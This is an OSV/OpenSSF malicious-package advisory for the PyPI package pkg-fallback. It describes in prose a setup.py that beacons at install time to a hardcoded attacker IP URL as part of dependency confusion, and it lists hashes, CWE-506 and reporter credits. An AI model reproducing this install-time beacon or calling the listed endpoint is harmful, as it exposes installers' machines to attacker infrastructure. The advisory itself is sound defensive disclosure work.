MAL-2026-6557
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pkg-fallback/MAL-2026-6557.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-6557
- Published
- 2026-06-28T06:01:28Z
- Modified
- 2026-06-28T08:15:56.051092370Z
- Summary
- Malicious code in pkg-fallback (PyPI)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (7f4ccaa9f059318782cd3b811f5bd6ea926e267e4b05dc4971d6acc6687d5d4f)
setup.py performs an unconditional urllib.request.urlopen() at install time to a hardcoded plaintext bare-IP endpoint http://157.254.194.200:8080/dependency-payload-1.0.0.tar.gz, with exceptions silently swallowed. This fires automatically during pip install (build/setup phase), confirming code execution on the installer's machine and disclosing the installer's network identity to attacker-controlled infrastructure. The distribution is published as 'pkg-fallback' but ships an unrelated 'string_kit' module described as 'string-kit' in README/PKG-INFO; the name/module divergence together with the install-time bare-IP beacon and the attacker-suggestive payload filename ('dependency-payload') is consistent with a dependency-confusion staging/enumeration package rather than a genuine utility.
Source: kam193 (4563c95d80446cbc0c815185ab9b3649b048c82a33b2d662523ce4760dbc6856)
Package exploits dependency confusion. A beacon request is used to report usage back, but no additional information are exfiltrated.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-beacon-dependency-confusion
Reasons (based on the campaign):
typosquatting
dependency-confusion
- Database specific
{ "malicious-packages-origins": [ { "versions": [ "1.1.0" ], "source": "amazon-inspector", "modified_time": "2026-06-28T06:01:28Z", "sha256": "7f4ccaa9f059318782cd3b811f5bd6ea926e267e4b05dc4971d6acc6687d5d4f", "id": "IN-MAL-2026-007697", "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "import_time": "2026-06-28T06:50:42.931191475Z" }, { "versions": [ "1.1.0" ], "modified_time": "2026-06-28T07:22:27.366925Z", "sha256": "4563c95d80446cbc0c815185ab9b3649b048c82a33b2d662523ce4760dbc6856", "id": "pypi/GENERIC-beacon-dependency-confusion/pkg-fallback", "source": "kam193", "import_time": "2026-06-28T08:10:57.722648683Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- Kamil MaĆkowski (kam193) - REPORTER
-
Affected packages
PyPI / pkg-fallback
Package
- Name
- pkg-fallback
- View open source insights on deps.dev
- Purl
- pkg:pypi/pkg-fallback
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affected
Database specific
cwes
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
indicators
{
"package_integrity": [
{
"filename": "pkg_fallback-1.1.0.tar.gz",
"hashes": {
"md5": "6f78fa86c4f5c320aec88febbcd47878",
"blake2b_256": "bfdd6c973cf80595a3f50e4d3e2c19dff3f72fda1ec86eb37689573bae86a5a9",
"sha256": "272ff22462e20ef5fd5766729843adfc577ff8a72c6c87e809c56efc6e042921"
}
}
],
"evidence_files": [
{
"path": "setup.py",
"tlsh": "6901ce85ce8078e5c9dba64548799c5e12326b033d01f4d9bb8983583f4d2dfcb36259",
"sha256": "e63cda868cf61706d3d8666c109977ecbcbc7b83f0d784a0330a4196bf034822"
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/pkg-fallback/MAL-2026-6557.json"